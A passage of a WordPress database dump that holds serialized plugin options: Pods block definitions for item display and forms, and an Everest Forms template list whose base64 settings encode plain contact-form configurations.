item.\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:5:{i:0;s:4:\"pods\";i:1;s:6:\"single\";i:2;s:4:\"item\";i:3;s:4:\"list\";i:4;s:6:\"fields\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:2:{i:0;s:8:\"postType\";i:1;s:6:\"postId\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:6:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:39:\"Defaults to using the current pod item.\";s:5:\"label\";s:10:\"Slug or ID\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:4:\"slug\";}i:3;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:11:\"Output Type\";s:7:\"options\";a:5:{i:0;a:2:{s:5:\"label\";s:21:\"Unordered list (<ul>)\";s:5:\"value\";s:2:\"ul\";}i:1;a:2:{s:5:\"label\";s:23:\"Description list (<dl>)\";s:5:\"value\";s:2:\"dl\";}i:2;a:2:{s:5:\"label\";s:24:\"Paragraph elements (<p>)\";s:5:\"value\";s:1:\"p\";}i:3;a:2:{s:5:\"label\";s:22:\"Div containers (<div>)\";s:5:\"value\";s:3:\"div\";}i:4;a:2:{s:5:\"label\";s:20:\"Table rows (<table>)\";s:5:\"value\";s:5:\"table\";}}s:4:\"help\";s:220:\"Choose how you want your output HTML to be set up. This allows you flexibility to build and style your output with any CSS customizations you would like. Some output types are naturally laid out better in certain themes.\";s:5:\"label\";s:11:\"Output Type\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:21:\"Unordered list (<ul>)\";s:5:\"value\";s:2:\"ul\";}}s:4:\"name\";s:19:\"display_output_type\";}i:4;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:122:\"Comma-separated list of the Pod Fields you want to display. Default is to show all. Use this OR the Exclude Fields option.\";s:5:\"label\";s:14:\"Display Fields\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:14:\"display_fields\";}i:5;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:135:\"Comma-separated list of the Pod Fields you want to exclude from display. Default is to show all. Use this OR the Display Fields option.\";s:5:\"label\";s:14:\"Exclude Fields\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:14:\"exclude_fields\";}}s:10:\"attributes\";a:11:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"slug\";a:1:{s:4:\"type\";s:6:\"string\";}s:19:\"display_output_type\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:21:\"Unordered list (<ul>)\";s:5:\"value\";s:2:\"ul\";}}s:14:\"display_fields\";a:1:{s:4:\"type\";s:6:\"string\";}s:14:\"exclude_fields\";a:1:{s:4:\"type\";s:6:\"string\";}}s:10:\"transforms\";a:0:{}}i:5;a:15:{s:9:\"blockName\";s:20:\"pods/pods-block-form\";s:15:\"blockGroupLabel\";s:7:\"Options\";s:5:\"title\";s:9:\"Pods Form\";s:11:\"description\";s:50:\"Display a form for creating and editing Pod items.\";s:10:\"renderType\";s:3:\"php\";s:8:\"category\";s:4:\"pods\";s:4:\"icon\";s:4:\"pods\";s:8:\"keywords\";a:3:{i:0;s:4:\"pods\";i:1;s:4:\"form\";i:2;s:5:\"input\";}s:8:\"supports\";a:13:{s:4:\"html\";b:0;s:5:\"align\";b:1;s:9:\"alignWide\";b:1;s:6:\"anchor\";b:0;s:15:\"customClassName\";b:1;s:8:\"inserter\";b:1;s:8:\"multiple\";b:1;s:8:\"reusable\";b:1;s:19:\"__experimentalColor\";b:1;s:22:\"__experimentalFontSize\";b:1;s:21:\"__experimentalPadding\";b:1;s:24:\"__experimentalLineHeight\";b:1;s:3:\"jsx\";b:0;}s:12:\"editorScript\";s:15:\"pods-blocks-api\";s:11:\"usesContext\";a:2:{i:0;s:8:\"postType\";i:1;s:6:\"postId\";}s:15:\"providesContext\";a:0:{}s:6:\"fields\";a:9:{i:0;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:8:\"Pod Name\";s:7:\"options\";a:13:{i:0;a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}i:1;a:2:{s:5:\"label\";s:8:\"document\";s:5:\"value\";s:8:\"document\";}i:2;a:2:{s:5:\"label\";s:13:\"ekms_bulletin\";s:5:\"value\";s:13:\"ekms_bulletin\";}i:3;a:2:{s:5:\"label\";s:11:\"institution\";s:5:\"value\";s:11:\"institution\";}i:4;a:2:{s:5:\"label\";s:21:\"institutions_category\";s:5:\"value\";s:21:\"institutions_category\";}i:5;a:2:{s:5:\"label\";s:16:\"knowledge_broker\";s:5:\"value\";s:16:\"knowledge_broker\";}i:6;a:2:{s:5:\"label\";s:12:\"mea_resource\";s:5:\"value\";s:12:\"mea_resource\";}i:7;a:2:{s:5:\"label\";s:16:\"project_resource\";s:5:\"value\";s:16:\"project_resource\";}i:8;a:2:{s:5:\"label\";s:13:\"related_topic\";s:5:\"value\";s:13:\"related_topic\";}i:9;a:2:{s:5:\"label\";s:17:\"resource_category\";s:5:\"value\";s:17:\"resource_category\";}i:10;a:2:{s:5:\"label\";s:12:\"resource_tag\";s:5:\"value\";s:12:\"resource_tag\";}i:11;a:2:{s:5:\"label\";s:13:\"resource_type\";s:5:\"value\";s:13:\"resource_type\";}i:12;a:2:{s:5:\"label\";s:10:\"university\";s:5:\"value\";s:10:\"university\";}}s:4:\"help\";s:87:\"Choose the pod to reference, or reference the Pod in the current context of this block.\";s:5:\"label\";s:8:\"Pod Name\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:4:\"name\";s:4:\"name\";}i:1;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:204:\"Read about how access rights control what can be displayed to other users: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:18:\"access_rights_help\";}i:2;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:38:\"Use this to enable editing of an item.\";s:5:\"label\";s:10:\"Slug or ID\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:4:\"slug\";}i:3;a:4:{s:4:\"type\";s:15:\"TextareaControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:19:\"textarea__container\";s:6:\"auto_p\";b:1;s:4:\"help\";s:83:\"Comma-separated list of the Pod Fields you want to include. Default is to show all.\";s:5:\"label\";s:11:\"Form Fields\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:6:\"fields\";}i:4;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:51:\"The label to show in the submit button of the form.\";s:5:\"label\";s:19:\"Submit Button Label\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:5:\"label\";}i:5;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:177:\"After someone submits the form, they can be redirected anywhere you would like. You can reference the saved item ID by using \"X_ID_X\" in the URL. The default is to not redirect.\";s:5:\"label\";s:12:\"Redirect URL\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:9:\"thank_you\";}i:6;a:4:{s:4:\"type\";s:13:\"SelectControl\";s:12:\"fieldOptions\";a:4:{s:7:\"heading\";s:11:\"Output Type\";s:7:\"options\";a:4:{i:0;a:2:{s:5:\"label\";s:22:\"Div containers (<div>)\";s:5:\"value\";s:3:\"div\";}i:1;a:2:{s:5:\"label\";s:21:\"Unordered list (<ul>)\";s:5:\"value\";s:2:\"ul\";}i:2;a:2:{s:5:\"label\";s:24:\"Paragraph elements (<p>)\";s:5:\"value\";s:1:\"p\";}i:3;a:2:{s:5:\"label\";s:20:\"Table rows (<table>)\";s:5:\"value\";s:5:\"table\";}}s:4:\"help\";s:217:\"Choose how you want your form HTML to be set up. This allows you flexibility to build and style your forms with any CSS customizations you would like. Some output types are naturally laid out better in certain themes.\";s:5:\"label\";s:11:\"Output Type\";}s:16:\"attributeOptions\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:22:\"Div containers (<div>)\";s:5:\"value\";s:3:\"div\";}}s:4:\"name\";s:16:\"form_output_type\";}i:7;a:4:{s:4:\"type\";s:11:\"TextControl\";s:12:\"fieldOptions\";a:4:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:236:\"Give this form a unique slug to reference in our user access checks. When you use the \"pods_user_can_access_object\" filter, you can selectively allow access through PHP if the user does not normally have access through WordPress itself.\";s:5:\"label\";s:15:\"Form Access Key\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:8:\"form_key\";}i:8;a:4:{s:4:\"type\";s:4:\"html\";s:12:\"fieldOptions\";a:5:{s:9:\"className\";s:15:\"text__container\";s:4:\"type\";s:4:\"text\";s:4:\"help\";s:0:\"\";s:12:\"html_content\";s:195:\"Find out more about how to customize access rights for this form: <a href=\"https://docs.pods.io/displaying-pods/access-rights-in-pods/\" target=\"_blank\" rel=\"noopener noreferrer\">Documentation</a>\";s:5:\"label\";s:13:\"Access Rights\";}s:16:\"attributeOptions\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";s:27:\"access_rights_form_key_help\";}}s:10:\"attributes\";a:14:{s:5:\"align\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"textColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:15:\"backgroundColor\";a:1:{s:4:\"type\";s:6:\"string\";}s:8:\"fontSize\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"style\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"name\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:19:\"- Use Current Pod -\";s:5:\"value\";s:0:\"\";}}s:18:\"access_rights_help\";a:1:{s:4:\"type\";s:6:\"string\";}s:4:\"slug\";a:1:{s:4:\"type\";s:6:\"string\";}s:6:\"fields\";a:1:{s:4:\"type\";s:6:\"string\";}s:5:\"label\";a:1:{s:4:\"type\";s:6:\"string\";}s:9:\"thank_you\";a:1:{s:4:\"type\";s:6:\"string\";}s:16:\"form_output_type\";a:2:{s:4:\"type\";s:6:\"object\";s:7:\"default\";a:2:{s:5:\"label\";s:22:\"Div containers (<div>)\";s:5:\"value\";s:3:\"div\";}}s:8:\"form_key\";a:1:{s:4:\"type\";s:6:\"string\";}s:27:\"access_rights_form_key_help\";a:1:{s:4:\"type\";s:6:\"string\";}}s:10:\"transforms\";a:1:{s:4:\"from\";a:2:{i:0;a:4:{s:4:\"type\";s:9:\"shortcode\";s:3:\"tag\";s:9:\"pods-form\";s:10:\"attributes\";a:7:{s:4:\"name\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"name\";}s:4:\"slug\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"slug\";}s:6:\"fields\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:6:\"fields\";}s:5:\"label\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:5:\"label\";}s:9:\"thank_you\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:9:\"thank_you\";}s:16:\"form_output_type\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:16:\"form_output_type\";}s:8:\"form_key\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:8:\"form_key\";}}s:13:\"isMatchConfig\";a:1:{i:0;a:2:{s:4:\"name\";s:4:\"name\";s:8:\"required\";b:0;}}}i:1;a:4:{s:4:\"type\";s:9:\"shortcode\";s:3:\"tag\";s:4:\"pods\";s:10:\"attributes\";a:7:{s:4:\"name\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"name\";}s:4:\"slug\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:4:\"slug\";}s:6:\"fields\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:6:\"fields\";}s:5:\"label\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:5:\"label\";}s:9:\"thank_you\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:9:\"thank_you\";}s:16:\"form_output_type\";a:3:{s:4:\"type\";s:6:\"object\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:16:\"form_output_type\";}s:8:\"form_key\";a:3:{s:4:\"type\";s:6:\"string\";s:6:\"source\";s:9:\"shortcode\";s:9:\"attribute\";s:8:\"form_key\";}}s:13:\"isMatchConfig\";a:1:{i:0;a:2:{s:4:\"name\";s:4:\"form\";s:8:\"required\";b:1;}}}}}}}','off'),(5629437,'_transient_timeout_evf_template_section_list','1782249721','off'),(5629438,'_transient_evf_template_section_list','O:8:\"stdClass\":1:{s:9:\"templates\";a:15:{i:0;O:8:\"stdClass\":4:{s:5:\"title\";s:18:\"Start From Scratch\";s:4:\"slug\";s:5:\"blank\";s:4:\"plan\";a:1:{i:0;s:4:\"free\";}s:5:\"image\";s:91:\"https://ekmsliberia.info/wp-content/plugins/everest-forms/assets/images/templates/blank.png\";}i:1;O:8:\"stdClass\":6:{s:5:\"title\";s:19:\"Simple Contact Form\";s:4:\"slug\";s:33:\"everest-forms-simple-contact-form\";s:8:\"settings\";s:4228:\"eyJpZCI6Mjk3LCJmb3JtX2VuYWJsZWQiOiIxIiwiZm9ybV9maWVsZF9pZCI6NSwiZm9ybV9maWVsZHMiOnsieXMwR2VaSVNScy0xIjp7ImlkIjoieXMwR2VaSVNScy0xIiwidHlwZSI6ImZpcnN0LW5hbWUiLCJsYWJlbCI6Ik5hbWUiLCJtZXRhLWtleSI6ImZpcnN0X25hbWVfNDc4OSIsImRlc2NyaXB0aW9uIjoiIiwicmVxdWlyZWQiOiIxIiwicGxhY2Vob2xkZXIiOiIiLCJjc3MiOiIiLCJjb25kaXRpb25hbF9vcHRpb24iOiJzaG93IiwiY29uZGl0aW9uYWxzIjp7IjEiOnsiMSI6eyJmaWVsZCI6Ii0tLVNlbGVjdCBGaWVsZC0tLSIsIm9wZXJhdG9yIjoiaXMiLCJ2YWx1ZSI6IiJ9fX19LCJMYkg1Tnhhc1hNLTIiOnsiaWQiOiJMYkg1Tnhhc1hNLTIiLCJ0eXBlIjoiZW1haWwiLCJsYWJlbCI6IkVtYWlsIiwibWV0YS1rZXkiOiJlbWFpbF8xMDM2IiwiZGVzY3JpcHRpb24iOiIiLCJyZXF1aXJlZCI6IjEiLCJwbGFjZWhvbGRlciI6IiIsImNvbmZpcm1hdGlvbl9wbGFjZWhvbGRlciI6IiIsImRlZmF1bHRfdmFsdWUiOiIiLCJjc3MiOiIiLCJjb25kaXRpb25hbF9vcHRpb24iOiJzaG93IiwiY29uZGl0aW9uYWxzIjp7IjEiOnsiMSI6eyJmaWVsZCI6Ii0tLVNlbGVjdCBGaWVsZC0tLSIsIm9wZXJhdG9yIjoiaXMiLCJ2YWx1ZSI6IiJ9fX19LCI2NkZSMzg0Y2dlLTMiOnsiaWQiOiI2NkZSMzg0Y2dlLTMiLCJ0eXBlIjoidGV4dCIsImxhYmVsIjoiU3ViamVjdCIsIm1ldGEta2V5Ijoic2luZ2xlX2xpbmVfdGV4dF8xMjEyIiwiZGVzY3JpcHRpb24iOiIiLCJwbGFjZWhvbGRlciI6IiIsImxpbWl0X2NvdW50IjoiMSIsImxpbWl0X21vZGUiOiJjaGFyYWN0ZXJzIiwiZGVmYXVsdF92YWx1ZSI6IiIsImNzcyI6IiIsImlucHV0X21hc2siOiIiLCJjb25kaXRpb25hbF9vcHRpb24iOiJzaG93IiwiY29uZGl0aW9uYWxzIjp7IjEiOnsiMSI6eyJmaWVsZCI6Ii0tLVNlbGVjdCBGaWVsZC0tLSIsIm9wZXJhdG9yIjoiaXMiLCJ2YWx1ZSI6IiJ9fX19LCJ5aEd4M0ZPd3IyLTQiOnsiaWQiOiJ5aEd4M0ZPd3IyLTQiLCJ0eXBlIjoidGV4dGFyZWEiLCJsYWJlbCI6Ik1lc3NhZ2UiLCJtZXRhLWtleSI6InBhcmFncmFwaF90ZXh0XzE4MjMiLCJkZXNjcmlwdGlvbiI6IiIsInBsYWNlaG9sZGVyIjoiIiwibGltaXRfY291bnQiOiIxIiwibGltaXRfbW9kZSI6ImNoYXJhY3RlcnMiLCJkZWZhdWx0X3ZhbHVlIjoiIiwiY3NzIjoiIiwiY29uZGl0aW9uYWxfb3B0aW9uIjoic2hvdyIsImNvbmRpdGlvbmFscyI6eyIxIjp7IjEiOnsiZmllbGQiOiItLS1TZWxlY3QgRmllbGQtLS0iLCJvcGVyYXRvciI6ImlzIiwidmFsdWUiOiIifX19fX0sInNldHRpbmdzIjp7ImZvcm1fdGl0bGUiOiJTaW1wbGUgQ29udGFjdCBGb3JtIiwiZm9ybV9kZXNjcmlwdGlvbiI6IiIsImZvcm1fZGlzYWJsZV9tZXNzYWdlIjoiVGhpcyBmb3JtIGlzIGRpc2FibGVkLiIsInN1Y2Nlc3NmdWxfZm9ybV9zdWJtaXNzaW9uX21lc3NhZ2UiOiJUaGFua3MgZm9yIGNvbnRhY3RpbmcgdXMhIFdlIHdpbGwgYmUgaW4gdG91Y2ggd2l0aCB5b3Ugc2hvcnRseSIsInN1Ym1pc3Npb25fbWVzc2FnZV9zY3JvbGwiOiIxIiwicmVkaXJlY3RfdG8iOiIwIiwiY3VzdG9tX3BhZ2UiOiIxMiIsImV4dGVybmFsX3VybCI6IiIsImxheW91dF9jbGFzcyI6ImRlZmF1bHQiLCJmb3JtX2NsYXNzIjoiIiwic3VibWl0X2J1dHRvbl90ZXh0IjoiU3VibWl0Iiwic3VibWl0X2J1dHRvbl9wcm9jZXNzaW5nX3RleHQiOiJQcm9jZXNzaW5nXHUyMDI2Iiwic3VibWl0X2J1dHRvbl9jbGFzcyI6IiIsInN1Ym1pdCI6eyJjb25uZWN0aW9uXzEiOnsiY29uZGl0aW9uYWxfbG9naWNfc3RhdHVzIjoiMCIsImNvbmRpdGlvbmFsX29wdGlvbiI6InNob3ciLCJjb25kaXRpb25hbHMiOnsiMSI6eyIxIjp7ImZpZWxkIjoiLS0tU2VsZWN0IEZpZWxkLS0tIiwib3BlcmF0b3IiOiJpcyIsInZhbHVlIjoiIn19fX19LCJob25leXBvdCI6IjEiLCJyZWNhcHRjaGFfc3VwcG9ydCI6IjAiLCJkaXNhYmxlZF9lbnRyaWVzIjoiMCIsImVtYWlsIjp7ImVuYWJsZV9lbWFpbF9ub3RpZmljYXRpb24iOiIxIiwiY29ubmVjdGlvbl8xIjp7ImNvbm5lY3Rpb25fbmFtZSI6IkFkbWluIE5vdGlmaWNhdGlvbiIsImV2Zl90b19lbWFpbCI6InthZG1pbl9lbWFpbH0iLCJldmZfZnJvbV9uYW1lIjoiRXZlcmVzdCBGb3JtcyIsImV2Zl9mcm9tX2VtYWlsIjoie2FkbWluX2VtYWlsfSIsImV2Zl9yZXBseV90byI6IiIsImV2Zl9lbWFpbF9zdWJqZWN0IjoiTmV3IEZvcm0gRW50cnkgIC0gU2ltcGxlIENvbnRhY3QgRm9ybSIsImV2Zl9lbWFpbF9tZXNzYWdlIjoie2FsbF9maWVsZHN9IiwiY29uZGl0aW9uYWxfbG9naWNfc3RhdHVzIjoiMCIsImNvbmRpdGlvbmFsX29wdGlvbiI6InNlbmQiLCJjb25kaXRpb25hbHMiOnsiMSI6eyIxIjp7ImZpZWxkIjoiLS0tU2VsZWN0IEZpZWxkLS0tIiwib3BlcmF0b3IiOiJpcyIsInZhbHVlIjoiIn19fX19LCJlbmFibGVfbXVsdGlfcGFydCI6IjAiLCJtdWx0aV9wYXJ0Ijp7ImluZGljYXRvciI6InByb2dyZXNzIiwiaW5kaWNhdG9yX2NvbG9yIjoiIzUxY2Y2NiIsIm5hdl9hbGlnbiI6ImNlbnRlciJ9LCJlbmFibGVfc3VydmV5IjoiMCIsImVuYWJsZV9wb2xsIjoiMCIsImVuYWJsZV9xdWl6IjoiMCIsInN1ZmZsZV9xdWVzdGlvbnMiOiIwIiwicXVpel9yZXBvcnRpbmciOiIwIiwicXVpel9yZXBvcnRpbmdfdHlwZSI6Imxhc3QiLCJvdmVyX2FsbF9mZWVkYmFjayI6IjAiLCJzY29yZV9mZWVkYmFjayI6eyIxIjp7ImZyb20iOiIwIiwidG8iOiIxMCIsImZlZWRiYWNrIjoiIn19fSwicGF5bWVudHMiOnsicGF5cGFsIjp7ImVuYWJsZV9wYXlwYWwiOiIxIiwicGF5cGFsX2VtYWlsIjoiIiwicGF5bWVudF9tb2RlIjoicHJvZHVjdGlvbiIsInBheW1lbnRfdHlwZSI6InByb2R1Y3Rfc2VydmljZSIsImNhbmNlbF91cmwiOiIiLCJjb25uZWN0aW9uXzEiOnsiY29uZGl0aW9uYWxfbG9naWNfc3RhdHVzIjoiMCIsImNvbmRpdGlvbmFsX29wdGlvbiI6InNlbmQiLCJjb25kaXRpb25hbHMiOnsiMSI6eyIxIjp7ImZpZWxkIjoiLS0tU2VsZWN0IEZpZWxkLS0tIiwib3BlcmF0b3IiOiJpcyIsInZhbHVlIjoiIn19fX19fSwic3RydWN0dXJlIjp7InJvd18xIjp7ImdyaWRfMSI6WyJ5czBHZVpJU1JzLTEiLCJMYkg1Tnhhc1hNLTIiLCI2NkZSMzg0Y2dlLTMiLCJ5aEd4M0ZPd3IyLTQiXX19fQ==\";s:12:\"preview_link\";s:63:\"https://demo.wpeverest.com/everest-forms/simple-contact-form-2/\";s:4:\"plan\";a:1:{i:0;s:4:\"free\";}s:5:\"image\";s:82:\"https://d3m99fsxk070py.cloudfront.net/images/everest-forms-simple-contact-form.png\";}i:2;O:8:\"stdClass\":8:{s:5:\"title\";s:21:\"Advanced Contact Form\";s:4:\"slug\";s:35:\"everest-forms-advanced-contact-form\";s:8:\"settings\";s:6656:\"eyJpZCI6MTMsImZvcm1fZW5hYmxlZCI6IjEiLCJmb3JtX2ZpZWxkX2lkIjoxMCwiZm9ybV9maWVsZHMiOnsiSUpvZ2dRTkZzYy0xIjp7ImlkIjoiSUpvZ2dRTkZzYy0xIiwidHlwZSI6ImZpcnN0LW5hbWUiLCJsYWJlbCI6IkZpcnN0IE5hbWUiLCJtZXRhLWtleSI6ImZpcnN0X25hbWVfOTk0NiIsImRlc2NyaXB0aW9uIjoiIiwicmVxdWlyZWQiOiIxIiwicGxhY2Vob2xkZXIiOiIiLCJjc3MiOiIiLCJjb25kaXRpb25hbF9vcHRpb24iOiJzaG93IiwiY29uZGl0aW9uYWxzIjp7IjEiOnsiMSI6eyJmaWVsZCI6Ii0tLVNlbGVjdCBGaWVsZC0tLSIsIm9wZXJhdG9yIjoiaXMifX19fSwiRUpta1d3SENCSS0yIjp7ImlkIjoiRUpta1d3SENCSS0yIiwidHlwZSI6Imxhc3QtbmFtZSIsImxhYmVsIjoiTGFzdCBOYW1lIiwibWV0YS1rZXkiOiJsYXN0X25hbWVfMTMxNyIsImRlc2NyaXB0aW9uIjoiIiwicmVxdWlyZWQiOiIxIiwicGxhY2Vob2xkZXIiOiIiLCJjc3MiOiIiLCJjb25kaXRpb25hbF9vcHRpb24iOiJzaG93IiwiY29uZGl0aW9uYWxzIjp7IjEiOnsiMSI6eyJmaWVsZCI6Ii0tLVNlbGVjdCBGaWVsZC0tLSIsIm9wZXJhdG9yIjoiaXMifX19fSwiRE94akRWVXdyTi0zIjp7ImlkIjoiRE94akRWVXdyTi0zIiwidHlwZSI6ImVtYWlsIiwibGFiZWwiOiJFbWFpbCIsIm1ldGEta2V5IjoiZW1haWxfMTU5NCIsImRlc2NyaXB0aW9uIjoiIiwicmVxdWlyZWQiOiIxIiwicGxhY2Vob2xkZXIiOiIiLCJjb25maXJtYXRpb25fcGxhY2Vob2xkZXIiOiIiLCJkZWZhdWx0X3ZhbHVlIjoiIiwiY3NzIjoiIiwiY29uZGl0aW9uYWxfb3B0aW9uIjoic2hvdyIsImNvbmRpdGlvbmFscyI6eyIxIjp7IjEiOnsiZmllbGQiOiItLS1TZWx